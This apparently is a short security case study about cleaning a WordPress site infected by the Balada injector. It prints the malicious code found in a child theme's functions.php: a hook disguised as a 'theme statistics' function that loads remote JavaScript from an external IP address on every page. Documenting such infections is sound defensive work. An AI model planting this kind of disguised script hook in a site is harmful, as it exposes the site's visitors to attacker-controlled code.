Stay Updated
Receive product news and insights, and stay in the loop!
Receive product news and insights, and stay in the loop!
A security scan detected malware, resulting in an unauthorized external JS loading on a website. This case study shares the investigation process and steps to remove a malicious code snippet found in the child theme's function.php, affected by the Balada injector malware. While Sucuri successfully identified this issue, Wordfence was unable to detect it.

Status:
function.php file calling the external JS:/* Theme statistics function */
function wptheme_stat() {
?>
<script async src="https://147.45.47.87/scripts/theme.js"></script>
<?php } ​ add\_action("wp\_head", "wptheme\_stat");
In this case, I tried using several security plugins, including Wordfence, but none of them could identify the problem, let alone the affected files.
Sucuri is the only service provider that detected the issue, either through their online service or plugin. The results indicate that the Balada injector malware is not easy to detect and check. Well done, Sucuri!
Beyond nations. Top E-Commerce. - No more worries or fears – just simple and joyful experiences : )